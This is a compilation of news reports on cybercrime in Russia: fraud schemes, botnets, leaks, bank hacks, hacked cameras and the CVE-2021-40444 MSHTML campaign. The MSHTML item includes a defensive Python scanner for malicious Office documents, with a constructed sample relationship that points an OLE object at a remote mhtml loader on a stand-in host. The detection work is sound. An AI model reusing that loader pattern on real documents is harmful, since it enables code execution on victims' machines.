Group-IB revealed 50 fraud schemes with fake investments

Analysts at Group-IB, a company specializing in cybersecurity, have revealed more than 50 schemes of fake investment projects and more than 8,000 domains connected with fraudulent infrastructure.

Fraudsters offer those who want to get rich quick the chance to invest in cryptocurrencies, stocks of oil and gas companies, gold, pharmaceuticals and other assets. Such schemes have been recorded by experts since at least 2016, but they became widespread in 2018-2020. Moreover, in the last nine months, 163% more domains have been registered for fake investment projects than in all previous years combined.

CERT-GIB's 24/7 Cyber Incident Response Center has identified over 50 templates of landing pages with a variety of ready-made investment scenarios about how to invest money to "get rich quick without much effort."

To design their websites, scammers illegally copied the style of popular news resources such as Russia 24, RT and RBC.

According to the Group-IB report, "as soon as a novice investor takes the "bait," he is directed to a survey site from a "well-known bank." As a rule, all of them are associated with trading in "crypto", fiat currencies, precious metals, minerals, natural resources, pharmaceuticals. Almost every project promises fantastic earnings - from 300 thousand to 10 million rubles per month".

Scammers make sure that the victim leaves his contact details. After that, a "personal consultant" calls the victim back and offers to register in the system in order to make a profit. But to do this, the victim needs to make a deposit of $250 or more.

Then the "investor" is shown his personal account in the system, with profit figures and trading results. However, these figures are fabricated, and it is impossible to withdraw the virtual money.

The "personal consultant" also asks the victim for bank card details and allegedly sends a request to the bank for approval of the deposit. In fact, the money is simply debited from the account.

In December, Group-IB experts estimated that monthly user losses from targeted fraud through surveys and sweepstakes worldwide amounted to $80 million.

Russians will face even more serious cyber threats in 2022

In particular, users should be wary of targeted ransomware attacks. Moreover, the damage will increase, not limited to the demand for ransom for encrypted data. Phishing and other types of attacks using social engineering will also remain popular with cybercriminals. In addition, attempts to hack smart devices are expected to rise.

Experts warned that businesses will become the most obvious target for attackers. The main blow will fall on supply chains, which are a weak link in protection due to the large number of participants in the process: contractors and business partners.

In December, it was reported that the barriers in Russian courtyards turned out to be a source of cyber threats. A vulnerability has been found in the device management system of the private company AM Video, which leads to the leakage of personal data. According to analysts, the discovered error allowed anyone to gain access to any of the company's facilities. To do this, it was necessary to log into a test account and select the identifier (ID) of cameras or barriers. The system provided access to all user data - names, addresses, phone numbers and car brands. Through the website, it was possible to block or open the entrance to the territory of the house, send notifications to residents on mobile phones and use their personal data.

Earlier it became known that 12 programs that steal banking data from infected devices were found in the Google Play app store for Android devices. The applications mimic document and QR code scanners. After the application is installed on the user's device, the program itself decides whether to download the malware to the phone. If the decision is positive, the malicious code reaches the victim through a fake request to update the program.

Russian experts have discovered the largest botnet in the history of the Internet

Hackers have combined several botnets to carry out the most powerful DDoS attacks on the Internet. Experts at StormWall, a Russian company specializing in protecting businesses from cyber threats, have recorded attacks with a capacity of more than 1 Tbit/s lasting for several days. Most often, they affected companies in the entertainment sector, retail, publishing houses and the fintech sector.

StormWall reported that the attacks were carried out using a new botnet consisting of several tens of thousands of servers with different versions of operating systems, as well as webcams, routers, smart TVs.

Since the botnet includes different devices based on different operating systems, it can be concluded that they are infected in different ways. Each attack had approximately the same power, but at the same time different geographical distribution, which indicates that not one botnet was used, but several combined into a single control system.

According to experts, the botnet's resources were divided between several users who could launch DDoS attacks simultaneously. At the same time, to launch the attack, each attacker used not the entire botnet, but a part of it. But even a part allowed organizing an attack with a capacity of several hundred gigabits per second.

According to Artem Tereshchenko, Development Director of VAS Experts, Internet security resources today are at a fairly high level, and in order to overwhelm them, attackers need to generate as much traffic as possible.

Experts believe that the botnet poses risks for both technology companies that provide their services over the Internet and for their customers. The purpose of the botnet is not just to harm, but to seize the personal data of users and commercial data of the company itself.

According to StormWall experts, hackers are combining botnets in order to get the maximum attack power, enough to even penetrate DDoS protection.

Software for hacking online cinemas is in open access

A code repository for illegally downloading movies from Netflix, Amazon Video, Apple TV+ and other popular platforms was published on GitHub. The published scripts allow bypassing the protection technology used by, among others, Russian online cinemas, and downloading video content.

The authors of the TorrentFreak portal reported that on December 28, software for free downloading of content from major video services such as Netflix, Apple TV+, Amazon Video, Disney+ and others appeared on the international developer platform GitHub. A user named Widevinedump published code to bypass Widevine's DRM protection technology and posted 12 scripts that allow downloading paid content in resolutions up to 720p from popular video services.

According to Karen Ghazaryan, Director General of the Internet Research Institute, almost every Internet browser has support for solutions that prevent illegal copying of files: Microsoft PlayReady or Adobe DRM. The DRM bypass technology, according to the expert, can also be applied to Russian online cinemas.

“It will not be widely used, the mechanism requires special competencies, but professional pirates may well. So the number of movies and TV series uploaded to torrents will increase, which is very useful before the holidays,” Mr. Ghazaryan believes.

Sergey Nenakhov, head of the cybersecurity audit department at Infosecurity a Softline Company, explains that Russian online cinemas mainly use the same technologies — Widevine from Google and FairPlay from Apple, some additionally embed watermarks in the video to identify leaks.

"But pirates can also make changes to the video stream, adding their own noise and "spoiling" watermarks to confuse the tracks," he adds.

According to experts, given the current level of availability of pirated content in the Russian Federation, this is unlikely to significantly change the situation.

The source code of the Public Services Portal of the Russian Federation was made publicly available

On December 25, a publication appeared on the Cybersec hacker website in which the author posted the source code of the Public Services Portal publicly. According to him, the data was downloaded from resources on mos.ru subdomains.

The author of Cybersec discovered an open repository containing the source code of the Public Services Portal as an unencrypted .git repository. In addition to the source code, the leak contains ESIA certificates that can be used to hack accounts.

After studying the code, it turned out that the Public Services Portal was created on the Bitrix engine, and the ESIA authorization system was based on OpenID. The author noted that his study will help to find other vulnerabilities in the system and close them, or else to exploit them and steal user data.

Also in the article, the author said that before publication he turned to the administration of Public Services Portal to tell about the data leak. However, they only asked him for a detailed description of the leak and its confirmation, and after that they stopped responding at all.

The head of the analytical center specializing in information security, Zecurion, Vladimir Ulyanov, said that most likely the fault is the usual human factor. In such cases, it is always either someone simply made a mistake due to lack of competence or carelessness and allowed the code to be disclosed, or it is a deliberate leak of information from those who have access to the source code.

Ashot Oganesyan, the founder of the DLBI data leak intelligence and monitoring service, said that user data did not end up online. However, it cannot be ruled out that the compromised code will allow attackers to gain access to it in the future.

Hacker group attacked a bank's correspondent account in the Central Bank of Russia

For the first time in three years, cybersecurity specialists at Group-IB have identified a successful attack on the interbank transfer system AWP KBR (automated workstation of a client of the Bank of Russia).

In February 2021, the attackers carried out a hacker attack against one of the banks and stole funds, gaining access to the interbank transfer system of the AWP KBR. Analysts of the cybersecurity company Group-IB associate the hacking with the activities of the MoneyTaker group involved in previous similar attacks.

According to the Group-IB report, the attack began in June 2020 "through the compromise of a company affiliated with the bank," after which the attackers explored the bank's internal network for six months.

In 2021, the attackers registered fake domain names using the name of the bank in the .org and .com zones rather than .ru. After that, the attackers "stole digital keys and later used them to sign payments passing through the transport gateway of the Bank of Russia."

Hackers were able to steal more than 500 million rubles ($6.7 million).

The experts emphasized that in the future, an increase in the number of such crimes is expected. “Taking into account the fact that we are more and more involved in electronic payments, then there will be more and more attempts to violate the law in this area”, said Nikolay Kulbaka, Financial Analyst and Associate Professor of Economics at RANEPA.

It is interesting to note that this is the first time since 2018 that the MoneyTaker hacker group has been able to steal money from a Russian bank's account at the Central Bank. Back then, more than 58 million rubles ($781 thousand) were withdrawn from PIR Bank's account at the Central Bank. In the same year, the Central Bank revoked PIR Bank's license due to violations of anti-money-laundering legislation.

Theft of personal data of Russians will be taken under control

The Ministry of Finance of Russia will take control of the theft and leakage of the personal data of citizens. The agency has signed a contract with TC Integration, which will monitor the darknet, hacker forums, and Telegram channels.

The amount of the contract of the Ministry of Finance is 24.3 million rubles ($326,000). Monitoring of personal data leaks should start working already at the end of January 2022.

TS Integration will manually and automatically collect information about the appearance of personal data on the darknet, tracking "cybercriminal forums with both open and restricted access", Telegram channels and hacker resources, applications for data exchange between software developers. In addition, the contractor will monitor the media reporting data theft. At least 300 resources are subject to monitoring, including those located in the Tor network.

It is assumed that the company will send weekly reports to the Ministry of Finance on all leaks, daily reports on critical ones, and will also conduct a statistical analysis of the darknet. The Ministry will be able to transfer information about the identified leaks to the authorities, telecom operators and state-owned companies, which may be a potential source of information about citizens.

Experts believe that the monitoring system will make it possible to timely find and stop at an early stage the leakage of personal data, their sale or posting in the public domain, as well as respond in a timely manner and initiate an investigation.

Earlier, the head of the State Duma Committee on Information Policy, Information Technologies and Communications, Alexander Khinshtein, said that virtual space is becoming more and more real, and problems arising in the digital environment can carry not imaginary, but tangible threats. He called personal data leaks one of the most pressing topics.

Footage from thousands of hacked CCTV cameras sold online in Russia

Thousands of private CCTV cameras have been hacked in Russia, said Igor Bederov, head of the Information and Analytical Research department at T.Hunter. According to him, many of these devices are located in hotels, massage rooms, salons where intimate haircuts and depilation are done.

This is evidenced by the many Telegram channels, VK public pages and forums on the Web where access to hacked cameras, or videos from them, is sold.

One of these channels published an advertisement for the sale of access to video from more than 300 cameras from other people's bedrooms, washrooms, medical offices, salons, changing rooms. Price — 600 rubles ($8). Thousands of screenshots from such cameras have been published as advertisements on the channel: one shows a naked woman on a massage table, the other shows a man doing intimate depilation.

“Owners of hotels, beauty salons and other types of businesses put cameras in their premises for security purposes. Often such cameras are located directly in the rooms or offices where intimate services are carried out. At the same time, they are not always properly protected,” Igor Bederov explained the reason for such leaks.

According to open sources, vulnerable cameras are located all over the world. Access is often sold by subscription. But this is not the only way to monetize hacked devices. For example, the media recently wrote about the sale of a 15 TB archive of video from surveillance cameras in Russian hotels and saunas.

Experts said that in some cases such footage is used to blackmail the people in the video or the owners of the cameras. Various services are often used to identify people from photos. If people cannot be identified, hackers can always find the organization where these cameras are installed from the metadata.

Oleg Bakhtadze-Karnaukhov, an independent researcher on the darknet, claims that most often attackers hack cameras with network port 37777.

At the same time, it is very easy to protect the device — just change the factory settings. However, according to the expert, this basic rule is often ignored.

Platforms for hiring “white hackers” may be created in Russia

The service should become an intermediary between companies that want to check their information systems for security and hackers who will receive a reward for hacking them. Rostelecom and Positive Technologies have become interested in such vulnerability search projects. But experts doubt the success of the projects: Russian companies, unlike foreign ones, often do not have budgets for such services, and they often simply do not respond to reports of vulnerabilities.

A representative of Positive Technologies said that the company plans to launch a platform in Russia in May 2022 that will become an aggregator of programs for “ethical hackers” to search for vulnerabilities, so-called bug bounty. As part of such programs, hackers receive rewards from companies for vulnerabilities found in their IT networks, systems, and applications.

Now, “white hackers” in most cases are looking for tasks on the international HackerOne platform. The interviewed experts expressed doubts about the advisability of creating a similar Russian service. In particular, Mikhail Sergeev, a leading engineer at CorpSoft24, pointed out that Russian business does not have the necessary budgets, and often large companies that can afford such a service “do not respond to reports of bugs found.”

“Launching a bug bounty program requires additional financial costs and a certain level of maturity of information security processes, which reduces the list of potential customers of such a platform in Russia”, added Ilya Shalenkov, head of the KPMG cybersecurity services group. The demand for such a service by Russian developers implies that they accept the “right to make a mistake.”

In August, it was reported that the Poly Network cryptocurrency platform, which lost several hundred million dollars as a result of a hack, decided to reward the hacker. Poly Network thanked the hacker for hacking the system and stealing $610 million, and offered him a reward of 500 thousand dollars. The statement did not specify in what form the money would be paid. It was also not specified whether the hacker accepted the award.

Hacker group RedCurl attacked a large Russian online store

Commercial espionage remains a rare phenomenon, but the success of this group can set a new trend.

The cybersecurity company Group-IB has discovered traces of new attacks by RedCurl hackers engaged in commercial espionage and theft of corporate documentation from companies from various industries. This time, the victim of the group was a Russian retailer, one of the top 20 largest online stores in Russia.

The company notes that it discovered the new Russian-speaking group last year. In the period from 2018 to 2020, the group carried out 26 attacks, and 14 victim organizations from different countries were identified. Among the hackers' targets were construction, financial and consulting companies, retailers, banks, and insurance and legal organizations located in Russia, Ukraine, the UK, Germany, Canada and Norway. In 2021, the attacks resumed.

According to experts, commercial espionage remains a rare phenomenon, but the success of this group can set a new trend. The company's specialists noted that since the beginning of 2021, 4 attacks have been recorded.

A feature of the group is the sending of phishing emails to different departments of the organization on behalf of the HR team. After a computer is infected, information about the victim's infrastructure begins to be collected on the organization's network; criminals are interested in the version and name of the infected system, the list of network and logical drives, and the list of passwords.

Experts note that the actions and methods of RedCurl are unique for Russian-speaking hackers; for example, it takes from 2 to 6 months from the moment of infection to data theft. The group does not use standard remote-control tools for compromised devices. Infection, persistence on an infected device, lateral movement within the network and theft of documents are carried out using self-written tools and several public ones.

The group does not encrypt the infrastructure of the victim company, does not withdraw money from accounts, and does not demand a ransom for stolen data. This may indicate that hackers are rewarded from other sources, and their goal is to secretly extract valuable information. According to the company, RedCurl is interested in business correspondence, personal files of employees, documentation on various legal entities, and court cases.


"Ransomware" screen on trams and TV billboards in Russia turns out to be an ad from a cyber security firm

According to Positive Technologies, provocative street art mimicking ransomware malware appeared first. Fake Windows interface windows were depicted on trams with the inscription “All passengers with sad faces. This tram has been hacked,” walls carried the text “We will return the wall for 3 BTC (bitcoin),” and TV screens showed “Right now we will steal Antey.”

A few days later, the images were replaced by others, which had the QR code of the Positive Technologies company's manifesto video about the need to pay attention to information protection.

According to Positive Technologies, with the help of an unusual campaign, the company tried to attract the attention of people and organizations to cybersecurity problems, which have become especially acute recently.

“In 2020, compared to 2019, the number of unique cyber incidents increased by 51%. Seven out of ten attacks were targeted. Most often, cybercriminals attacked government and medical institutions, as well as industrial enterprises,” Positive Technologies reports.

Information security experts note that the number of cyberattacks in the world has increased by 40% this year compared to the previous one. As for Russia, the number of cyberattacks has increased even more significantly — by 54%.

“The concept of art is that we visually convey the process of a hacker attack. The information environment already affects the real one. The main desire is to show through clear and simple images that everything can be hacked in the modern world. And do not underestimate such threats, because while you are reading this text, someone can hack you,” said one of the artists.

The number of DDoS attacks on Russian companies has increased 2.5 times since the beginning of the year

The press service of Rostelecom reported that the number of DDoS attacks on Russian companies in the three quarters of 2021 increased 2.5 times compared to the same period last year.

According to the report, “the main targets of the attackers were financial organizations, the public sector, as well as the sphere of online commerce. The number of DDoS attacks on data centers and gaming, which were the focus of hackers a year ago, has decreased”.

The largest number of attacks occurred in Moscow, their share was 60% of the total number of incidents, the shares of other regions did not exceed 7%.

The company added that the number of DDoS attacks on banks increased by 3.5 times, almost 90% of them occurred in September.

The number of DDoS attacks in the online trading segment increased by 20%. The number of DDoS attacks on the public sector also doubled in August and September compared to the same period in 2020.

“Every year, the power and complexity of DDoS attacks increases. This is due to the active use of larger-scale botnets by hackers. They consist of a variety of devices, and more and more vulnerabilities are used to hack them,” said Timur Ibragimov, head of the Anti-DDoS and WAF platform of Solar MSS cybersecurity services at Rostelecom-Solar.

According to him, in particular, in September, the attackers organized the largest DDoS attack using the Meris botnet, the estimated scale of which is 200 thousand devices. “Such attacks are already directed at well-protected organizations and companies whose resources can only be disabled by a very powerful DDoS. For example, it can be banks, large industrial or energy enterprises, etc.,” he added.

It is worth noting that, according to Atlas VPN, the number of DDoS attacks worldwide in the first half of the year increased by 11%, reaching 5.4 million. Thus, the number of attacks in the first half of the year turned out to be a record.

The Consulate General of the Russian Federation in Ukraine called the hacking of its accounts an information provocation

The Consulate General of Russia in Kharkiv (Ukraine) considers the hacking of its pages on social networks as an information provocation. “The issue regarding this incident will be resolved between Ukraine and Russia at the diplomatic level,” Igor Demyanenko, the head of the Consulate General, said on Thursday.

“We took it as an informational provocation that does not show Ukraine's compliance with the Vienna Convention on Consular Relations,” he said, adding that “the issue will be resolved through diplomatic channels between the Russian Foreign Ministry and the Ukrainian Foreign Ministry.”

Mr. Demyanenko said that such a situation had developed for the first time, and confirmed that access to the accounts of the Consulate General in social networks had already been restored. And the official website of the diplomatic mission posted a message stating that the information previously published by the attackers on the pages of the Consulate General is invalid.

At the same time, he noted that after the incident, the number of subscribers on the pages of the Consulate General increased fivefold.

Earlier on Thursday, it became known that the Instagram and Facebook accounts of the Consulate General of the Russian Federation in Kharkiv had been hacked: congratulations on the Day of Defenders of Ukraine (October 14) appeared on the consulate's page, and the post also contained provocative statements addressed to the Russian leadership, allegedly on behalf of the consulate staff. After the hacker attack, the Consulate General lost access to account management. The Embassy of the Russian Federation in Kiev sent a note verbale to the Ministry of Foreign Affairs of Ukraine requesting that the Ukrainian competent authorities launch an investigation.

The US did not invite Russia and China to an online conference on combating cybercrime

The US National Security Council organized virtual meetings this week to discuss countering ransomware operators. In total, 30 countries were invited to the conference, including Ukraine, Mexico, Israel, Germany, and the UK, however, Russia and China were not invited to the discussion.

The cyber threat posed by ransomware is increasingly worrying people at the highest level. The ransoms have already reached over $400 million in 2020 and $81 million in the first quarter of 2021.

US President Joe Biden announced in early October that representatives from more than 30 countries will work together to fight back against cybercriminals distributing ransomware. This initiative was the result of very dangerous and large-scale attacks by ransomware operators that recently hit Colonial Pipeline and Kaseya.

It is interesting to note that recently Russian Deputy Foreign Minister Sergei Ryabkov made it clear that Moscow is interested in discussing the problem of ransomware viruses with Washington, but does not want contacts to be limited only to this topic. “American colleagues are still trying to focus all their work on what interests them,” he complained at the time.

Despite the previously announced cooperation in the field of cybersecurity between Moscow and Washington, no one expected Russian official representatives at the meetings. The organizers of the meetings did not invite China and Russia.

Perhaps the reason lies in a misunderstanding that arose at a certain stage. The United States has repeatedly asked Russia to take measures against ransomware operators located in the country. White House Press Secretary Jen Psaki even promised that Washington itself would deal with these cyber groups if the Kremlin could not.

Half of the Russian websites of small and medium-sized enterprises have vulnerabilities

According to Tinkoff, almost half (46%) of online resources for SMEs in Russia have cybersecurity issues.

The most critical of the most common errors is the weak protection of cloud storage, threatening data leakage (identified in more than a quarter of organizations).

These disappointing statistics are based on the analysis of more than 40 thousand sites and databases of small companies and individual entrepreneurs. The areas most vulnerable in terms of information security were consulting, retail and IT (44% of the problems found).

Most often (in 33% of cases) SMEs make domain verification errors. Such mistakes allow a resource to be taken over through data substitution.

The second place in the rating is taken by the threat of confidential information leakage arising from open access to the database or from the use of a weak password (27%). The ability to obtain a key by a simple brute-force attack allows an attacker to obtain personal data of customers and company employees, trade secrets, source codes of programs, etc.

The third most frequent cybersecurity error, according to Tinkoff, is "SSL Unknown subject" (15%). Such a problem during SSL certificate verification threatens interception and disclosure of data (a MITM attack).

The researchers also found that the resources of SMEs are poorly protected from ransomware attacks (9%).

The top five problems also included another common error — an expired SSL certificate (7%). When the browser shows that the certificate is invalid, the site may fall out of access; as a result, the company loses potential customers.

“Unfortunately, cybersecurity is poorly developed in Russia and business does not realize how important it is to protect data. Firstly, the services of good and competent specialists are very expensive; secondly, after the crisis, companies direct working capital primarily for the purchase of goods and current needs,” comments Pavel Segal, First Vice President of “OPORA Russia”.

Putin demanded to protect children from harmful information on the Internet

Russian President Vladimir Putin demanded to protect children from harmful information on the Internet. He believes that this is a very urgent problem that the whole world is solving now. According to the president, there are people who, for their own profit, drive minors to suicide.

“As for information resources, I believe that our schools should use state information resources. This does not mean at all that we should reduce the space of freedom to a minimum. Not at all,” the Russian leader clarified.

Putin reminded that personal data of users are collected by all information resources, “so we should take care to ensure the safety of children and citizens in the online space”.

“And here, of course, only the state can be asked for their rational use and for ensuring the safety of people. Therefore, information resources in schools should be state-owned,” the president explained.

“We know, unfortunately, that all sorts of shameless people who do not think about anything but profit use the Internet to make a profit to the maximum. And, sorry for the bad manners, they didn't care about the fate of people and children. Therefore, this is where children are driven to suicide, here is child pornography,” Putin explained.

He also positively assessed the initiative of domestic Internet companies to create their own public organization to ensure the information hygiene of minors. “We will continue to support and help this,” the president concluded.  

On September 1, Putin said that the state and society should join efforts to create a safe online space for children. He expressed hope that global digital platforms will be involved in ensuring the safety of children online.


Russia plans to launch a platform for white hat hackers

Igor Lyapunov, the vice-president of Rostelecom for information security, said that the platform will function similarly to the HackerOne resource. That company was one of the first to attract hackers to cooperate: Twitter, Slack, Adobe, Yahoo! and other major resources work with it, and HackerOne pays specialists for the bugs found. The project will be implemented on the basis of the National Cyber Polygon created by Rostelecom.

“Participation in vulnerability search programs is a really correct and useful practice, which allows detecting weaknesses in protection in time,” Lyapunov stressed, adding that banks have to use HackerOne for the same purposes one way or another.

Experts believe that the Russian analog of the platform will increase the security of the Russian banking infrastructure. It will provide access to the expertise of white hat hackers for companies that have legal difficulties using a foreign platform.

Tinkoff Bank already uses such a platform, and several more Russian banks are planning to use its services in the future.

Nevertheless, experts pointed to the weak control over researchers' methods and tools. According to them, the reward is often only a formal reason for taking part in the research, while the real price of the vulnerabilities found can be significantly higher on the black market, so hackers may subsequently resell tools for hacking the infrastructure.

An expert from Jet Infosystems does not see any risk in Russian banks using foreign platforms, because each platform has its own rules and the companies themselves set restrictions for researchers. According to him, if the platform for white hat hackers is launched on the basis of the Russian National Cyber Polygon, Russian banks will trust it more.


Russia will develop a new cyber security standard

Positive Technologies is developing the concept for a new cyber security standard. The document is intended to become an open knowledge base shared among specialists to improve their qualifications.

Today, each company sets up its own information security parameters; when a single standard appears, organizations will be able to develop the most effective solutions together.

Experts noted that the document will also help solve the problem of personnel shortage in the IT industry: specialists from other fields interested in information security will be able to get additional skills in this database and retrain to work in this field.

Oleg Gubka, Development Director of the Avanpost company, agrees that the initiative is relevant, but, in his opinion, the standard will be effective if it is developed well.

He believes that it is necessary to create an expert council of representatives of companies who would carefully study all sections of the standard according to their successful projects.

"Information security standards have existed for a long time, why come up with another one is a big question," said Fyodor Dbar, commercial director of Security Codes. 

He believes that this will not help solve the problem of inefficient spending of budgets on information security products, since cybersecurity strongly depends on the development of the organization and the attention of its top officials to launching new processes. And the driver in the cyber security market is not standards, but events such as the mass transfer of employees from the office to remote work or the emergence of new regulatory requirements.

According to Alexander Konovalov, Technical Director of Varonis Systems in Russia, there are enough standards, methods, training systems and guidance documents in this industry. He emphasizes that the problem lies in the overload of specialized employees, who are busy with “routine” and cannot fully master the hardware and software for data protection that they have already acquired. Therefore, the solution is not another standard but an expansion of information security department staff.

MSHTML Attack Targets Russian State Rocket Centre and Interior Ministry

 

An MSHTML vulnerability tracked as CVE-2021-40444 is being used to target Russian entities, according to Malwarebytes.

Malwarebytes Intelligence has detected email attachments aimed specifically at Russian organisations. The first template they discovered is designed to resemble an internal communication within JSC GREC Makeyev.

The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic asset of the country's defence and industrial complex for both the rocket and space industries. It is also the primary manufacturer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centres for developing rocket and space technology. 

The email purports to be from the organization's Human Resources (HR) department. It stated that HR is conducting a check of the personal information given by workers. Employees are asked to fill out a form and send it to HR, or to respond to the email. 

When the recipient wants to fill out the form, they must first allow editing, and that action alone is sufficient to trigger the exploit. When the target opens the malicious Office document, MSHTML loads a specially crafted ActiveX control, which can then execute arbitrary code and infect the machine with further malware.
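For defenders triaging attachments like those described above, the loader pattern seen in CVE-2021-40444 lures is an Office Open XML package whose relationship part points an OLE object at an external target rather than an embedded part. The check below is an added example, not Malwarebytes' code; the two sample documents it builds are constructed, and the `example.invalid` host is a placeholder.

```python
"""Flag Office Open XML documents whose relationship parts reference an
external OLE object (the CVE-2021-40444 loader pattern). Added example,
not Malwarebytes' code; the sample documents are constructed in memory."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE_SUFFIX = "/relationships/oleObject"
# Targets that pull content from outside the package: an mhtml: wrapper or
# a plain http(s) URL, instead of an embedded part such as embeddings/*.bin.
REMOTE_TARGET = re.compile(r"^(mhtml:|https?:)", re.IGNORECASE)


def find_remote_ole_targets(docx_bytes: bytes) -> list:
    """Return '<rels part>: <target>' for every external OLE relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if rtype.endswith(OLE_TYPE_SUFFIX) and (external or REMOTE_TARGET.match(target)):
                    hits.append(f"{name}: {target}")
    return hits


def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal package containing only the parts the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006" + OLE_TYPE_SUFFIX
# Constructed samples: a benign embedded object and a remote mhtml loader.
BENIGN = build_docx(f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId5" '
                    f'Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/></Relationships>')
SUSPICIOUS = build_docx(f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId5" '
                        f'Type="{OLE_TYPE}" Target="mhtml:http://example.invalid/side.html'
                        f'!x-usc:http://example.invalid/side.html" TargetMode="External"/></Relationships>')
```

Running `find_remote_ole_targets` over a mailbox export flags documents worth sandboxing before a user is ever asked to "enable editing".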

The second file Malwarebytes discovered appears to come from the Ministry of the Interior in Moscow; such an attachment could be used against a wide range of interesting targets. The document's title translates to "Notification of illegal activity."

It requests that the recipient complete the form and submit it to the Ministry of Internal Affairs, or respond to the email. It also encourages the targeted victim to do so within seven days. 

Malwarebytes further stated that they seldom come across evidence of cybercrime against Russian targets. Given the targets, particularly the first one, they believe a state-sponsored actor is behind these attacks and are investigating their origin.

Vulnerability Patch

The CVE-2021-40444 vulnerability is rather old-fashioned in nature (it involves ActiveX); however, it was only discovered recently. It wasn't long before threat actors were posting proofs-of-concept, tutorials and exploits on hacker forums, allowing anybody to conduct their own attacks by following step-by-step instructions.

Microsoft immediately issued mitigation instructions that blocked the installation of new ActiveX controls and managed to squeeze a fix into its most recent Patch Tuesday release, just a few weeks after the flaw was made public. 

The time it takes to build a patch, on the other hand, is frequently overshadowed by the time it takes users to apply it. Organizations, particularly large ones, are frequently discovered to be far behind in patching, thus the chances of more cyberattacks like these increase.

The August cyber attacks targeted a dozen Russian banks

Up to 15 Russian financial organizations were subjected to a large-scale cyberattack in August and September of this year.

The first deputy head of the Information Security Department of the Bank of Russia, Artem Sychev, said that 10-15 Russian financial organizations that serve e-commerce were subjected to cyber attacks in August and early September.

According to him, these were several DDoS attacks. “Most of these attacks were repelled in an automated mode by the means that financial organizations have,” Sychev noted.

Financial CERT (the Financial Sector Computer Emergency Response Team, a special division of the Bank of Russia) also helped to cope with the attacks: it quickly notified banks about them and brought telecom operators in to solve the problems. The operators helped to quickly redirect traffic and enable tools that filter malicious traffic.

According to Sychev, the attacks were serious, but the attackers failed to disrupt the performance of credit institutions.

“But, nevertheless, there is such a risk of dependence on monopoly service providers for financial organizations,” he added.

“The events that took place in Russia in August and early September and were associated with massive DDoS attacks clearly showed that it is not enough for us, as the financial industry, to exchange information with each other, we need to do this with telecom operators, as they are the basis for interaction between customers and financial organizations. How quickly we can interact between financial organizations and telecom operators largely depends on how quickly we can respond to the attacks that occur in the financial sector, and how quickly we can cope with these attacks,” Sychev added.

On September 2, Deputy Chairman of the Board of Sberbank Stanislav Kuznetsov said that the bank had successfully repelled the world's most powerful DDoS attack on the financial sector.